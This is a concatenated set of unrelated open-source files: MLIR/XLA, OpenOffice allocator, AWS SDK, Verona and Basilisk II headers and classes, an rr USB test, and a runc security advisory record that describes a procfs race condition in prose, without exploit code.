xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CeilOp>(xla_hlo::CeilOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CeilFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::ConvertOp>( xla_lhlo::ConvertOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type sourceType = args.front().getType(); Type targetType = result_types.front(); if (mlir::SIToFPOp::areCastCompatible(sourceType, targetType)) { return b->create<mlir::SIToFPOp>(xla_op.getLoc(), result_types, args, mlir::None); } else if (sourceType.isa<FloatType>() && targetType.isa<FloatType>()) { FloatType src = sourceType.cast<FloatType>(); FloatType res = targetType.cast<FloatType>(); if (src.getWidth() > res.getWidth()) { return b->create<mlir::FPTruncOp>(xla_op.getLoc(), result_types, args, mlir::None); } else if (src.getWidth() < res.getWidth()) { return b->create<mlir::FPExtOp>(xla_op.getLoc(), result_types, args, mlir::None); } // No conversion is needed for the same width floats return args.front(); } if (sourceType.isSignlessInteger() && targetType.isSignlessInteger()) { IntegerType src = sourceType.cast<IntegerType>(); IntegerType res = targetType.cast<IntegerType>(); if (src.getWidth() > res.getWidth()) { return b->create<mlir::TruncateIOp>(xla_op.getLoc(), result_types, args, mlir::None); } else if (src.getWidth() < res.getWidth()) { return b->create<mlir::ZeroExtendIOp>(xla_op.getLoc(), result_types, args, mlir::None); } // No conversion is needed for the same width integers return args.front(); } // TODO(dfki-ehna): Add other primitive type conversions // if (mlir::FpToSiOp::areCastCompatible(sourceType, 
targetType)) { // return b.create<mlir::FpToSiOp>(xla_op.getLoc(), result_types, // args,mlir::None); // } return nullptr; } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::CosOp>(xla_lhlo::CosOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CosOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::CosOp>(xla_hlo::CosOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::CosOp>{}( xla_op.getLoc(), result_types, args, b); } /// Implements the conversion of XLA op to scalar op (to use within region of a /// linalg.generic op) for compare-select style operations like min/max. template <typename... Args> struct MapXlaCompareSelectOpToStdScalarOp { Value operator()(Location loc, StringRef comparison_direction, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return nullptr; } }; /// Specialization which allows converting to a comparison operation in standard /// dialect with a given predicate based on the element type of the operand. template <typename SupportedType, typename StdCompareOp, typename Predicate, typename... Args> struct MapXlaCompareSelectOpToStdScalarOp<SupportedType, StdCompareOp, Predicate, Args...> { Value operator()(Location loc, StringRef comparison_direction, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type element_type = args.front().getType(); if (element_type.isa<SupportedType>()) { auto predicate = getCmpPredicate<Predicate>(comparison_direction); assert(predicate.hasValue() && "expected valid comparison direction"); auto cmp = b->template create<StdCompareOp>(loc, predicate.getValue(), args[0], args[1]); return b->create<::mlir::SelectOp>(loc, cmp, args[0], args[1]); } return MapXlaCompareSelectOpToStdScalarOp<Args...>{}( loc, comparison_direction, result_types, args, b); } }; template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::MaxOp>(xla_lhlo::MaxOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_lhlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_lhlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "GT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::MaxOp>(xla_hlo::MaxOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_hlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_hlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "GT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::MinOp>(xla_lhlo::MinOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_lhlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_lhlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "LT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::MinOp>(xla_hlo::MinOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaCompareSelectOpToStdScalarOp< IntegerType, ScalarIOp<xla_hlo::CompareOp>, CmpIPredicate, FloatType, ScalarFOp<xla_hlo::CompareOp>, CmpFPredicate>{}(xla_op.getLoc(), "LT", result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::NegOp>(xla_lhlo::NegOp xla_op, ArrayRef<Type> 
result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::NegFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::NegOp>(xla_hlo::NegOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::NegFOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::SelectOp>( xla_lhlo::SelectOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<::mlir::SelectOp>{}(xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::SelectOp>( xla_hlo::SelectOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<::mlir::SelectOp>{}(xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::SignOp>( xla_lhlo::SignOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { Type element_type = args.front().getType(); if (element_type.isa<FloatType>()) { FloatType float_type = element_type.cast<FloatType>(); APFloat const_value = float_type.isF32() ? APFloat(1.0f) : APFloat(1.0); Value one = b->create<mlir::ConstantFloatOp>(xla_op.getLoc(), const_value, float_type); return b->create<::mlir::CopySignOp>(xla_op.getLoc(), result_types, one, args[0]); } return nullptr; } template <> inline Value MapXlaOpToStdScalarOp<xla_lhlo::TanhOp>( xla_lhlo::TanhOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::TanhOp>{}( xla_op.getLoc(), result_types, args, b); } template <> inline Value MapXlaOpToStdScalarOp<xla_hlo::TanhOp>(xla_hlo::TanhOp xla_op, ArrayRef<Type> result_types, ArrayRef<Value> args, OpBuilder* b) { return MapXlaOpToStdScalarOpImpl<FloatType, ::mlir::TanhOp>{}( xla_op.getLoc(), result_types, args, b); } } // namespace xla_lhlo } // namespace mlir #endif // TENSORFLOW_COMPILER_MLIR_XLA_TRANSFORMS_MAP_XLA_TO_SCALAR_OP_H_
10,741
679
<filename>main/sal/inc/rtl/alloc.h /************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #ifndef _RTL_ALLOC_H_ #define _RTL_ALLOC_H_ # include <sal/types.h> #ifdef __cplusplus extern "C" { #endif /** Allocate memory. @descr A call to this function will return NULL upon the requested memory size being either zero or larger than currently allocatable. @param Bytes [in] memory size. @return pointer to allocated memory. */ void * SAL_CALL rtl_allocateMemory ( sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Reallocate memory. @descr A call to this function with parameter 'Ptr' being NULL is equivalent to a rtl_allocateMemory() call. A call to this function with parameter 'Bytes' being 0 is equivalent to a rtl_freeMemory() call. @see rtl_allocateMemory() @see rtl_freeMemory() @param Ptr [in] pointer to previously allocated memory. @param Bytes [in] new memory size. @return pointer to reallocated memory. May differ from Ptr. */ void * SAL_CALL rtl_reallocateMemory ( void * Ptr, sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Free memory. @param Ptr [in] pointer to previously allocated memory. @return none. Memory is released. Ptr is invalid. */ void SAL_CALL rtl_freeMemory ( void * Ptr ) SAL_THROW_EXTERN_C(); /** Allocate and zero memory. @descr A call to this function will return NULL upon the requested memory size being either zero or larger than currently allocatable. @param Bytes [in] memory size. @return pointer to allocated and zero'ed memory. */ void * SAL_CALL rtl_allocateZeroMemory ( sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Zero and free memory. @param Ptr [in] pointer to previously allocated memory. @param Bytes [in] memory size. @return none. Memory is zero'ed and released. Ptr is invalid. */ void SAL_CALL rtl_freeZeroMemory ( void * Ptr, sal_Size Bytes ) SAL_THROW_EXTERN_C(); /** Opaque rtl_arena_type. */ typedef struct rtl_arena_st rtl_arena_type; #define RTL_ARENA_NAME_LENGTH 31 /** rtl_arena_create() * * @param pName [in] descriptive name; for debugging purposes. * @param quantum [in] resource allocation unit / granularity; rounded up to next power of 2. * @param quantum_cache_max [in] max resources to cache; rounded up to next multiple of quantum; usually 0. * @param source_arena [in] passed as argument to source_alloc, source_free; usually NULL. * @param source_alloc [in] function to allocate resources; usually rtl_arena_alloc. * @param source_free [in] function to free resources; usually rtl_arena_free. * @param nFlags [in] flags; usually 0. * * @return pointer to rtl_arena_type, or NULL upon failure. 
* * @see rtl_arena_destroy() */ rtl_arena_type * SAL_CALL rtl_arena_create ( const char * pName, sal_Size quantum, sal_Size quantum_cache_max, rtl_arena_type * source_arena, void * (SAL_CALL * source_alloc)(rtl_arena_type *, sal_Size *), void (SAL_CALL * source_free) (rtl_arena_type *, void *, sal_Size), int nFlags ) SAL_THROW_EXTERN_C(); /** rtl_arena_destroy() * * @param pArena [in] the arena to destroy. * @return None * * @see rtl_arena_create() */ void SAL_CALL rtl_arena_destroy ( rtl_arena_type * pArena ) SAL_THROW_EXTERN_C(); /** rtl_arena_alloc() * * @param pArena [in] arena from which resource is allocated. * @param pBytes [inout] size of resource to allocate. * * @return allocated resource, or NULL upon failure. * * @see rtl_arena_free() */ void * SAL_CALL rtl_arena_alloc ( rtl_arena_type * pArena, sal_Size * pBytes ) SAL_THROW_EXTERN_C(); /** rtl_arena_free() * * @param pArena [in] arena from which resource was allocated. * @param pAddr [in] resource to free. * @param nBytes [in] size of resource. * * @return None. * * @see rtl_arena_alloc() */ void SAL_CALL rtl_arena_free ( rtl_arena_type * pArena, void * pAddr, sal_Size nBytes ) SAL_THROW_EXTERN_C(); /** Opaque rtl_cache_type. */ typedef struct rtl_cache_st rtl_cache_type; #define RTL_CACHE_NAME_LENGTH 31 #define RTL_CACHE_FLAG_BULKDESTROY 1 /** rtl_cache_create() * * @param pName [in] descriptive name; for debugging purposes. * @param nObjSize [in] object size. * @param nObjAlign [in] object alignment; usually 0 for suitable default. * @param constructor [in] object constructor callback function; returning 1 for success or 0 for failure. * @param destructor [in] object destructor callback function. * @param reclaim [in] reclaim callback function. * @param pUserArg [in] opaque argument passed to callback functions. * @param nFlags [in] flags. * * @return pointer to rtl_cache_type, or NULL upon failure. * * @see rtl_cache_destroy() */ rtl_cache_type * SAL_CALL rtl_cache_create ( const char * pName, sal_Size nObjSize, sal_Size nObjAlign, int (SAL_CALL * constructor)(void * pObj, void * pUserArg), void (SAL_CALL * destructor) (void * pObj, void * pUserArg), void (SAL_CALL * reclaim) (void * pUserArg), void * pUserArg, rtl_arena_type * pSource, int nFlags ) SAL_THROW_EXTERN_C(); /** rtl_cache_destroy() * * @param pCache [in] the cache to destroy. * * @return None. * * @see rtl_cache_create() */ void SAL_CALL rtl_cache_destroy ( rtl_cache_type * pCache ) SAL_THROW_EXTERN_C(); /** rtl_cache_alloc() * * @param pCache [in] cache from which object is allocated. * * @return pointer to allocated object, or NULL upon failure. */ void * SAL_CALL rtl_cache_alloc ( rtl_cache_type * pCache ) SAL_THROW_EXTERN_C(); /** rtl_cache_free() * * @param pCache [in] cache from which object was allocated. * @param pObj [in] object to free. * * @return None. * * @see rtl_cache_alloc() */ void SAL_CALL rtl_cache_free ( rtl_cache_type * pCache, void * pObj ) SAL_THROW_EXTERN_C(); #ifdef __cplusplus } #endif #endif /*_RTL_ALLOC_H_ */
2,630
1,467
<filename>core/sdk-core/src/main/java/software/amazon/awssdk/core/retry/backoff/BackoffStrategy.java /* * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ package software.amazon.awssdk.core.retry.backoff; import java.time.Duration; import software.amazon.awssdk.annotations.SdkPublicApi; import software.amazon.awssdk.core.internal.retry.SdkDefaultRetrySetting; import software.amazon.awssdk.core.retry.RetryMode; import software.amazon.awssdk.core.retry.RetryPolicyContext; @SdkPublicApi @FunctionalInterface public interface BackoffStrategy { /** * Max permitted retry times. To prevent exponentialDelay from overflow, there must be 2 ^ retriesAttempted * <= 2 ^ 31 - 1, which means retriesAttempted <= 30, so that is the ceil for retriesAttempted. */ int RETRIES_ATTEMPTED_CEILING = (int) Math.floor(Math.log(Integer.MAX_VALUE) / Math.log(2)); /** * Compute the delay before the next retry request. This strategy is only consulted when there will be a next retry. * * @param context Context about the state of the last request and information about the number of requests made. * @return Amount of time in milliseconds to wait before the next attempt. Must be non-negative (can be zero). */ Duration computeDelayBeforeNextRetry(RetryPolicyContext context); default int calculateExponentialDelay(int retriesAttempted, Duration baseDelay, Duration maxBackoffTime) { int cappedRetries = Math.min(retriesAttempted, RETRIES_ATTEMPTED_CEILING); return (int) Math.min(baseDelay.multipliedBy(1L << cappedRetries).toMillis(), maxBackoffTime.toMillis()); } static BackoffStrategy defaultStrategy() { return defaultStrategy(RetryMode.defaultRetryMode()); } static BackoffStrategy defaultStrategy(RetryMode retryMode) { return FullJitterBackoffStrategy.builder() .baseDelay(SdkDefaultRetrySetting.baseDelay(retryMode)) .maxBackoffTime(SdkDefaultRetrySetting.MAX_BACKOFF) .build(); } static BackoffStrategy defaultThrottlingStrategy() { return defaultThrottlingStrategy(RetryMode.defaultRetryMode()); } static BackoffStrategy defaultThrottlingStrategy(RetryMode retryMode) { switch (retryMode) { case LEGACY: return EqualJitterBackoffStrategy.builder() .baseDelay(SdkDefaultRetrySetting.throttledBaseDelay(retryMode)) .maxBackoffTime(SdkDefaultRetrySetting.MAX_BACKOFF) .build(); case ADAPTIVE: case STANDARD: return FullJitterBackoffStrategy.builder() .baseDelay(SdkDefaultRetrySetting.throttledBaseDelay(retryMode)) .maxBackoffTime(SdkDefaultRetrySetting.MAX_BACKOFF) .build(); default: throw new IllegalStateException("Unsupported RetryMode: " + retryMode); } } static BackoffStrategy none() { return FixedDelayBackoffStrategy.create(Duration.ofMillis(1)); } }
1,598
892
{ "schema_version": "1.2.0", "id": "GHSA-fh74-hm69-rqjw", "modified": "2021-05-24T21:20:41Z", "published": "2021-05-27T18:41:17Z", "aliases": [ "CVE-2019-19921" ], "summary": "procfs race condition with a shared volume mount", "details": "### Impact\nBy crafting a malicious root filesystem (with `/proc` being a symlink to a directory which was inside a volume shared with another running container), an attacker in control of both containers can trick `runc` into not correctly configuring the container&amp;amp;amp;amp;#39;s security labels and not correctly masking paths inside `/proc` which contain potentially-sensitive information about the host (or even allow for direct attacks against the host).\n\nIn order to exploit this bug, an untrusted user must be able to spawn custom containers with custom mount configurations (such that a volume is shared between two containers). It should be noted that we consider this to be a fairly high level of access for an untrusted user -- and we do not recommend allowing completely untrusted users to have such degrees of access without further restrictions.\n\n### Patches\nThis vulnerability has been fixed in `1.0.0-rc10`. It should be noted that the current fix is effectively a hot-fix, and there are known ways for it to be worked around (such as making the entire root filesystem a shared volume controlled by another container). We recommend that users review their access policies to ensure that untrusted users do not have such high levels of controls over container mount configuration.\n\n### Workarounds\nIf you are not providing the ability for untrusted users to configure mountpoints for `runc` (or through a higher-level tool such as `docker run -v`) then you are not vulnerable to this issue. This exploit requires fairly complicated levels of access (which are available for some public clouds but are not necessarily available for all deployments).\n\nAdditionally, it appears as though it is not possible to exploit this vulnerability through Docker (due to the order of mounts Docker generates). 
However you should not depend on this, as it may be possible to work around this roadblock.\n\n### Credits\nThis vulnerability was discovered by Cure53, as part of a third-party security audit.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* [Open an issue](https://github.com/opencontainers/runc/issues/new).\n* Email us at [<EMAIL>](mailto:<EMAIL>), or [<EMAIL>](mailto:<EMAIL>) if you think you&amp;amp;amp;amp;#39;ve found a security bug.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:U/RL:U/RC:U" } ], "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc/libcontainer" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/opencontainers/runc/security/advisories/GHSA-fh74-hm69-rqjw" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19921" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/issues/2197" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/pull/2190" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/pull/2207" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0688" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0695" }, { "type": "WEB", "url": "https://github.com/opencontainers/runc/releases" }, { "type": "WEB", "url": "https://security-tracker.debian.org/tracker/CVE-2019-19921" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-21" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4297-1/" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00018.html" } ], "database_specific": { "cwe_ids": [ "CWE-362" ], "severity": "MODERATE", "github_reviewed": true } }
1,727
580
<reponame>omonimus1/angorithm_AND_dataStructure
// UVA01124.cpp : This file contains the 'main' function. Program execution begins and ends there.
//

#include <iostream>
#include<string>
using namespace std;

int main()
{
    string line;
    while (getline(cin, line))
    {
        cout << line << endl;
    }
}
122
3,477
<filename>src/parser/pass.h
// Copyright Microsoft and Project Verona Contributors.
// SPDX-License-Identifier: MIT
#pragma once

#include "dispatch.h"
#include "fields.h"

#include <iostream>

namespace verona::parser
{
#define AST_PASS \
  void pre(NodeDef& node) {} \
  void post(NodeDef& node) {}

  template<typename F>
  struct Pass
  {
    AstPath stack;
    bool ok;
    std::ostream out;

    Pass() : ok(true), out(std::cerr.rdbuf()) {}

    operator bool() const
    {
      return ok;
    }

    void set_error(std::ostream& s)
    {
      out.rdbuf(s.rdbuf());
    }

    std::ostream& error()
    {
      ok = false;
      return out << "--------" << std::endl;
    }

    Location loc()
    {
      if (stack.size() > 0)
        return stack.back()->location;

      return {};
    }

    text line()
    {
      return text(loc());
    }

    Ast parent()
    {
      if (stack.size() > 1)
        return stack[stack.size() - 2];

      return {};
    }

    Pass& operator<<(Location& loc)
    {
      // Handle location fields from the node handling functions.
      return *this;
    }

    template<typename T>
    Pass& operator<<(Node<T>& node)
    {
      stack.push_back(node);
      dispatch(*this, node);
      stack.pop_back();
      return *this;
    }

    template<typename T>
    Pass& operator<<(List<T>& nodes)
    {
      for (auto& node : nodes)
        *this << node;

      return *this;
    }

    void operator()() {}

    template<typename T>
    void operator()(T& node)
    {
      auto& check = stack.back();
      static_cast<F*>(this)->pre(node);

      // Don't continue if this node was replaced.
      if (stack.back() != check)
        return;

      *this << fields(node);
      static_cast<F*>(this)->post(node);
    }
  };
}
794
940
<gh_stars>100-1000
/*
 *  disk.h - Generic disk driver
 *
 *  Basilisk II (C) 1997-2008 <NAME>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
 */

#ifndef DISK_H
#define DISK_H

const int DiskRefNum = -63;            // RefNum of driver

const uint16 DiskDriverFlags = 0x6f04; // Driver flags

extern const uint8 DiskIcon[258];      // Icon data (copied to ROM by PatchROM())
extern uint32 DiskIconAddr;            // Icon address (Mac address space, set by PatchROM())

extern void DiskInit(void);
extern void DiskExit(void);

extern void DiskInterrupt(void);

extern bool DiskMountVolume(void *fh);

extern int16 DiskOpen(uint32 pb, uint32 dce);
extern int16 DiskPrime(uint32 pb, uint32 dce);
extern int16 DiskControl(uint32 pb, uint32 dce);
extern int16 DiskStatus(uint32 pb, uint32 dce);

#endif
458
5,156
<reponame>jalapenopuzzle/rr<filename>src/test/usb.c /* -*- Mode: C; tab-width: 8; c-basic-offset: 2; indent-tabs-mode: nil; -*- */ /* Based on https://github.com/ktossell/libuvc/blob/master/src/example.c Software License Agreement (BSD License) Copyright (C) 2010-2015 <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the author nor other contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* Tests a subset of the USBDEVFS ioctls. Requires libuvc to build: https://github.com/ktossell/libuvc Therefore this test is not built/run by default. */ #include "util.h" #include "libuvc/libuvc.h" static int frame_count = 0; void cb(uvc_frame_t* frame, __attribute__((unused)) void* ptr) { uvc_frame_t* bgr; uvc_error_t ret; bgr = uvc_allocate_frame(frame->width * frame->height * 3); test_assert(bgr != NULL); ret = uvc_any2bgr(frame, bgr); test_assert(ret == 0); ++frame_count; uvc_free_frame(bgr); } int main(void) { uvc_context_t* ctx; uvc_device_t* dev; uvc_device_handle_t* devh; uvc_stream_ctrl_t ctrl; uvc_error_t res; res = uvc_init(&ctx, NULL); test_assert(res >= 0); atomic_puts("UVC initialized"); /* Locates the first attached UVC device, stores in dev */ res = uvc_find_device(ctx, &dev, 0, 0, NULL); /* filter devices: vendor_id, product_id, "serial_num" */ if (res < 0) { atomic_puts("No device found"); atomic_puts("EXIT-SUCCESS"); return 0; } atomic_puts("Device found"); /* Try to open the device: requires exclusive access */ res = uvc_open(dev, &devh); if (res < 0) { atomic_puts("Can't open device"); atomic_puts("EXIT-SUCCESS"); return 0; } atomic_puts("Device opened"); /* Print out a message containing all the information that libuvc * knows about the device */ uvc_print_diag(devh, stdout); /* Try to negotiate a 640x480 30 fps YUYV stream profile */ res = uvc_get_stream_ctrl_format_size( devh, &ctrl, /* result stored in ctrl */ UVC_FRAME_FORMAT_YUYV, /* YUV 422, aka YUV 4:2:2. try _COMPRESSED */ 640, 480, 30 /* width, height, fps */ ); /* Print out the result */ uvc_print_stream_ctrl(&ctrl, stdout); if (res < 0) { atomic_puts("No matching stream"); atomic_puts("EXIT-SUCCESS"); return 0; } /* Start the video stream. 
The library will call user function cb: * cb(frame, (void*) 12345) */ res = uvc_start_streaming(devh, &ctrl, cb, (void*)12345, 0); test_assert(res >= 0); atomic_puts("Streaming..."); uvc_set_ae_mode(devh, 1); /* e.g., turn on auto exposure */ sleep(2); /* stream for 2 seconds */ atomic_puts("Stopping streaming."); /* End the stream. Blocks until last callback is serviced */ uvc_stop_streaming(devh); atomic_puts("Done streaming."); /* Release our handle on the device */ uvc_close(devh); atomic_puts("Device closed"); /* Release the device descriptor */ uvc_unref_device(dev); /* Close the UVC context. This closes and cleans up any existing device * handles, * and it closes the libusb context if one was not provided. */ uvc_exit(ctx); test_assert(frame_count > 0); atomic_puts("EXIT-SUCCESS"); return 0; }
1,653
3,372
/* * Copyright 2016-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.kinesisanalyticsv2.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.protocol.StructuredPojo; import com.amazonaws.protocol.ProtocolMarshaller; /** * <p> * Describes the application, including the application Amazon Resource Name (ARN), status, latest version, and input * and output configurations. * </p> * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/kinesisanalyticsv2-2018-05-23/ApplicationDetail" * target="_top">AWS API Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class ApplicationDetail implements Serializable, Cloneable, StructuredPojo { /** * <p> * The ARN of the application. * </p> */ private String applicationARN; /** * <p> * The description of the application. * </p> */ private String applicationDescription; /** * <p> * The name of the application. * </p> */ private String applicationName; /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> */ private String runtimeEnvironment; /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> */ private String serviceExecutionRole; /** * <p> * The status of the application. * </p> */ private String applicationStatus; /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> */ private Long applicationVersionId; /** * <p> * The current timestamp when the application was created. * </p> */ private java.util.Date createTimestamp; /** * <p> * The current timestamp when the application was last updated. * </p> */ private java.util.Date lastUpdateTimestamp; /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> */ private ApplicationConfigurationDescription applicationConfigurationDescription; /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> */ private java.util.List<CloudWatchLoggingOptionDescription> cloudWatchLoggingOptionDescriptions; /** * <p> * The details of the maintenance configuration for the application. * </p> */ private ApplicationMaintenanceConfigurationDescription applicationMaintenanceConfigurationDescription; /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> */ private Long applicationVersionUpdatedFrom; /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> */ private Long applicationVersionRolledBackFrom; /** * <p> * A value you use to implement strong concurrency for application updates. 
* </p> */ private String conditionalToken; /** * <p> * The version to which you want to roll back the application. * </p> */ private Long applicationVersionRolledBackTo; /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> */ private String applicationMode; /** * <p> * The ARN of the application. * </p> * * @param applicationARN * The ARN of the application. */ public void setApplicationARN(String applicationARN) { this.applicationARN = applicationARN; } /** * <p> * The ARN of the application. * </p> * * @return The ARN of the application. */ public String getApplicationARN() { return this.applicationARN; } /** * <p> * The ARN of the application. * </p> * * @param applicationARN * The ARN of the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationARN(String applicationARN) { setApplicationARN(applicationARN); return this; } /** * <p> * The description of the application. * </p> * * @param applicationDescription * The description of the application. */ public void setApplicationDescription(String applicationDescription) { this.applicationDescription = applicationDescription; } /** * <p> * The description of the application. * </p> 